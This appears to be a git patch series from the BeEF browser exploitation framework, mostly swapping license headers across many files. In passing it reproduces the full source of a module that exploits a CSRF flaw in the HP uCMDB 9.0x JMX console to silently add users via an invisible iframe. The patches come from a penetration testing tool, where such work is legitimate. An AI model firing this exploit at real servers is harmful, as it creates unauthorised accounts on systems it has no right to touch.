+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 require 'test/unit'
 
 class TC_CheckEnvironment < Test::Unit::TestCase
@@ -7,4 +12,4 @@ class TC_CheckEnvironment < Test::Unit::TestCase
 
   end
 
-end
\ No newline at end of file
+end

From d2188b230c4a7a6c4a7f298536262f376c5e4f17 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 15:27:01 +1000
Subject: [PATCH 095/397] More changed license headers

---
 INSTALL.txt                                   |  16 +-
 README                                        | 158 ++++++++----------
 README.mkd                                    | 158 ++++++++----------
 core/loader.rb                                |  15 +-
 core/main/handlers/modules/command.rb         |  14 +-
 extensions/admin_ui/media/css/base.css        |  17 +-
 extensions/admin_ui/media/css/ext-all.css     |  17 +-
 extensions/admin_ui/media/css/wterm.css       |  17 +-
 extensions/demos/html/butcher/butch.css       |  17 +-
 extensions/notifications/notifications.rb     |  15 +-
 extensions/requester/api/hook.rb              |  17 +-
 extensions/xssrays/api/scan.rb                |  16 +-
 .../hooked_domain/ajax_fingerprint/module.rb  |  15 +-
 .../hp_ucmdb_add_user_csrf/command.js         |  73 ++++----
 .../hp_ucmdb_add_user_csrf/config.yaml        |  40 ++---
 .../exploits/hp_ucmdb_add_user_csrf/module.rb |  71 ++++----
 modules/host/get_physical_location/command.js |  21 +--
 .../host/get_physical_location/config.yaml    |  17 +-
 modules/host/get_physical_location/module.rb  |  17 +-
 modules/host/get_wireless_keys/command.js     |  21 +--
 modules/host/get_wireless_keys/config.yaml    |  17 +-
 .../persistence/man_in_the_browser/command.js |  19 +--
 .../phonegap_check_connection/command.js      |  20 +--
 .../phonegap_persist_resume/command.js        |  19 +--
 .../clickjacking/command.js                   |  19 +--
 .../clickjacking/config.yaml                  |  14 +-
 .../social_engineering/clickjacking/module.rb |  16 +-
 27 files changed, 317 insertions(+), 559 deletions(-)

diff --git a/INSTALL.txt b/INSTALL.txt
index fcf9719c5..552ccfc6d 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,18 +1,8 @@
 ===============================================================================
    
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
 
diff --git a/README b/README
index cdca66e3c..e91bcb000 100644
--- a/README
+++ b/README
@@ -1,84 +1,74 @@
-===============================================================================
-   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
-===============================================================================
-
-What is BeEF?
--------------
-
-BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
-
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-
-
-Get Involved 
-------------
-
-You can get in touch with the BeEF team. Just check out the following: 
-
-
-Please, send us pull requests!
-
-Web: http://beefproject.com/
-
-Mail: beef-subscribe@bindshell.net
-
-IRC: ircs://irc.freenode.net/beefproject
-
-Twitter: @beefproject
-
-
-Requirements
-------------
-
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-* [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
-
-
-Quick Start
------------ 
-
-__The following is for the impatient.__ 
-
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-
-   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
-
-
-Usage 
------ 
-
-To get started, simply execute beef and follow the instrustions: 
-
-   $ ./beef
-
+===============================================================================
+   
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+Please, send us pull requests!
+
+Web: http://beefproject.com/
+
+Mail: beef-subscribe@bindshell.net
+
+IRC: ircs://irc.freenode.net/beefproject
+
+Twitter: @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instrustions: 
+
+   $ ./beef
+
diff --git a/README.mkd b/README.mkd
index 272b5ae76..498d190c9 100644
--- a/README.mkd
+++ b/README.mkd
@@ -1,84 +1,74 @@
-===============================================================================
-   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
-===============================================================================
-
-What is BeEF?
--------------
-
-__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
-
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-
-
-Get Involved 
-------------
-
-You can get in touch with the BeEF team. Just check out the following: 
-
-
-__Please, send us pull requests!__
-
-__Web:__ http://beefproject.com/
-
-__Mail:__ beef-subscribe@bindshell.net
-
-__IRC:__ ircs://irc.freenode.net/beefproject
-
-__Twitter:__ @beefproject
-
-
-Requirements
-------------
-
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-* [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
-   - bundler 
-   - thin
-   - Sinatra 
-   - ANSI 
-   - TERM-ANSIcolor 
-   - dm-core 
-   - json 
-   - data_objects 
-   - dm-sqlite-adapter 
-   - parseconfig 
-   - erubis 
-   - dm-migrations 
-   - msfrpc-client 
-   - eventmachine
-   - win32console (Windows Only)
-
-
-Quick Start
------------ 
-
-__The following is for the impatient.__ 
-
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-
-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
-
-
-Usage 
------ 
-
-To get started, simply execute beef and follow the instructions: 
-
-       $ ./beef
-
+===============================================================================
+   
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+__Please, send us pull requests!__
+
+__Web:__ http://beefproject.com/
+
+__Mail:__ beef-subscribe@bindshell.net
+
+__IRC:__ ircs://irc.freenode.net/beefproject
+
+__Twitter:__ @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instructions: 
+
+       $ ./beef
+
diff --git a/core/loader.rb b/core/loader.rb
index 3ba04c62f..4a947536c 100644
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
 
 # @note Include here all the gems we are using
 require 'rubygems'
diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index d4c97834a..0df1cbdc9 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -51,19 +51,11 @@ module BeEF
             #todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
-              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
               #//
-              #//   Licensed under the Apache License, Version 2.0 (the "License");
-              #//   you may not use this file except in compliance with the License.
-              #//   You may obtain a copy of the License at
+              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              #//   See the file 'doc/COPYING' for copying permission
               #//
-              #//       http://www.apache.org/licenses/LICENSE-2.0
-              #//
-              #//   Unless required by applicable law or agreed to in writing, software
-              #//   distributed under the License is distributed on an "AS IS" BASIS,
-              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-              #//   See the License for the specific language governing permissions and
-              #//   limitations under the License.
               #//', "")
               ws.send(@output, hooked_browser.session)
             else
diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index ca32174a6..516acd487 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
- *
- *   Licensed under the Apache License, Version 2.0 (the "License");
- *   you may not use this file except in compliance with the License.
- *   You may obtain a copy of the License at
- *
- *       http://www.apache.org/licenses/LICENSE-2.0
- *
- *   Unless required by applicable law or agreed to in writing, software
- *   distributed under the License is distributed on an "AS IS" BASIS,
- *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *   See the License for the specific language governing permissions and
- *   limitations under the License.
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
  */
+
 #header .right-menu {
 	float: right;
 	margin: 10px;
diff --git a/extensions/admin_ui/media/css/ext-all.css b/extensions/admin_ui/media/css/ext-all.css
index 7e56a6030..230fbd0ae 100644
--- a/extensions/admin_ui/media/css/ext-all.css
+++ b/extensions/admin_ui/media/css/ext-all.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
- *
- *   Licensed under the Apache License, Version 2.0 (the "License");
- *   you may not use this file except in compliance with the License.
- *   You may obtain a copy of the License at
- *
- *       http://www.apache.org/licenses/LICENSE-2.0
- *
- *   Unless required by applicable law or agreed to in writing, software
- *   distributed under the License is distributed on an "AS IS" BASIS,
- *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *   See the License for the specific language governing permissions and
- *   limitations under the License.
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
  */
+
 /*!
  * Ext JS Library 3.3.1
  * Copyright(c) 2006-2010 Sencha Inc.
diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css
index 064e8cd41..45217e860 100644
--- a/extensions/admin_ui/media/css/wterm.css
+++ b/extensions/admin_ui/media/css/wterm.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
- *
- *   Licensed under the Apache License, Version 2.0 (the "License");
- *   you may not use this file except in compliance with the License.
- *   You may obtain a copy of the License at
- *
- *       http://www.apache.org/licenses/LICENSE-2.0
- *
- *   Unless required by applicable law or agreed to in writing, software
- *   distributed under the License is distributed on an "AS IS" BASIS,
- *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *   See the License for the specific language governing permissions and
- *   limitations under the License.
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
  */
+
 /* Basic Terminal CSS */
 .wterm_terminal {  background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto;  }
 
diff --git a/extensions/demos/html/butcher/butch.css b/extensions/demos/html/butcher/butch.css
index c5e6b59b4..efb2f7610 100644
--- a/extensions/demos/html/butcher/butch.css
+++ b/extensions/demos/html/butcher/butch.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
- *
- *   Licensed under the Apache License, Version 2.0 (the "License");
- *   you may not use this file except in compliance with the License.
- *   You may obtain a copy of the License at
- *
- *       http://www.apache.org/licenses/LICENSE-2.0
- *
- *   Unless required by applicable law or agreed to in writing, software
- *   distributed under the License is distributed on an "AS IS" BASIS,
- *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- *   See the License for the specific language governing permissions and
- *   limitations under the License.
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
  */
+
 html {
 	height: 100%;
 }
diff --git a/extensions/notifications/notifications.rb b/extensions/notifications/notifications.rb
index b9e5cbb94..6ae72817f 100644
--- a/extensions/notifications/notifications.rb
+++ b/extensions/notifications/notifications.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
 
 require 'extensions/notifications/channels/tweet'
 require 'extensions/notifications/channels/email'
diff --git a/extensions/requester/api/hook.rb b/extensions/requester/api/hook.rb
index 1faa059b0..f9377d82a 100644
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -3,6 +3,7 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+
 module BeEF
   module Extension
     module Requester
@@ -31,19 +32,9 @@ module BeEF
             #todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
               content = File.read(find_beefjs_component_path 'beef.net.requester').gsub('//
-              //   Copyright 2012 Wade Alcorn wade@bindshell.net
-              //
-              //   Licensed under the Apache License, Version 2.0 (the "License");
-              //   you may not use this file except in compliance with the License.
-              //   You may obtain a copy of the License at
-              //
-              //       http://www.apache.org/licenses/LICENSE-2.0
-              //
-              //   Unless required by applicable law or agreed to in writing, software
-              //   distributed under the License is distributed on an "AS IS" BASIS,
-              //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-              //   See the License for the specific language governing permissions and
-              //   limitations under the License.
+              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              //   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              //   See the file \'doc/COPYING\' for copying permission
               //', "")
               add_to_body output
               ws.send(content + @body,hb.session)
diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb
index 0f4ca3691..ceb0b3374 100644
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -43,19 +43,9 @@ module BeEF
             # todo antisnatchor: remove this gsub crap adding some hook packing.
             if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
               content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
-              //   Copyright 2012 Wade Alcorn wade@bindshell.net
-              //
-              //   Licensed under the Apache License, Version 2.0 (the "License");
-              //   you may not use this file except in compliance with the License.
-              //   You may obtain a copy of the License at
-              //
-              //       http://www.apache.org/licenses/LICENSE-2.0
-              //
-              //   Unless required by applicable law or agreed to in writing, software
-              //   distributed under the License is distributed on an "AS IS" BASIS,
-              //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-              //   See the License for the specific language governing permissions and
-              //   limitations under the License.
+              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              //   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              //   See the file \'doc/COPYING\' for copying permission
               //', "")
               add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
               ws.send(content + @body,hb.session)
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb
index 279cccf47..68227c438 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb
+++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
 
 class Ajax_fingerprint < BeEF::Core::Command
  
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
index 5626d880b..d30127f35 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/command.js
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -1,41 +1,32 @@
-//
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-beef.execute(function() {	
-var protocol = '<%= @protocol %>';
-var host = '<%= @host %>';
-var port = '<%= @port %>';
-var usertype = '<%= @usertype %>';
-var customerid = '<%= @customerid %>';
-var username = '<%= @username %>';
-var password = '<%= @password %>';
-
-var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
-url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
-
-if (usertype == 'createIntegrationUser'){
-	url += '&arg3=';
-}
-
-var ucmdb_iframe = beef.dom.createInvisibleIframe();
-ucmdb_iframe.setAttribute('src', url);
-
-cleanup = function() {
-    document.body.removeChild(ucmdb_iframe);
-}
-setTimeout("cleanup()", 15000);
-
-beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
-});
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
+beef.execute(function() {	
+var protocol = '<%= @protocol %>';
+var host = '<%= @host %>';
+var port = '<%= @port %>';
+var usertype = '<%= @usertype %>';
+var customerid = '<%= @customerid %>';
+var username = '<%= @username %>';
+var password = '<%= @password %>';
+
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+
+if (usertype == 'createIntegrationUser'){
+	url += '&arg3=';
+}
+
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
+ucmdb_iframe.setAttribute('src', url);
+
+cleanup = function() {
+    document.body.removeChild(ucmdb_iframe);
+}
+setTimeout("cleanup()", 15000);
+
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
index 4202b6c98..50fc32640 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -1,25 +1,15 @@
-#
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-beef:
-    module:
-        hp_ucmdb_add_user_csrf:
-            enable: true
-            category: "Exploits"
-            name: "HP uCMDB 9.0x add user CSRF"
-            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
-            authors: ["Bart Leppens"]
-            target:
-                working: ["ALL"]
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        hp_ucmdb_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "HP uCMDB 9.0x add user CSRF"
+            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
+            authors: ["Bart Leppens"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
index 3213161a7..9781327d7 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -1,40 +1,31 @@
-#
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
-
-  def self.options
-    return [
-		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
-          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
-          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
-        },
-        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
-        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
-        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
-          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
-          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
-        },
-		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
-		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
-		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
-    ]
-  end
-
-  def post_execute
-    save({'result' => @datastore['result']})
-  end
-
-end
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+        },
+        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+        },
+		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end
diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js
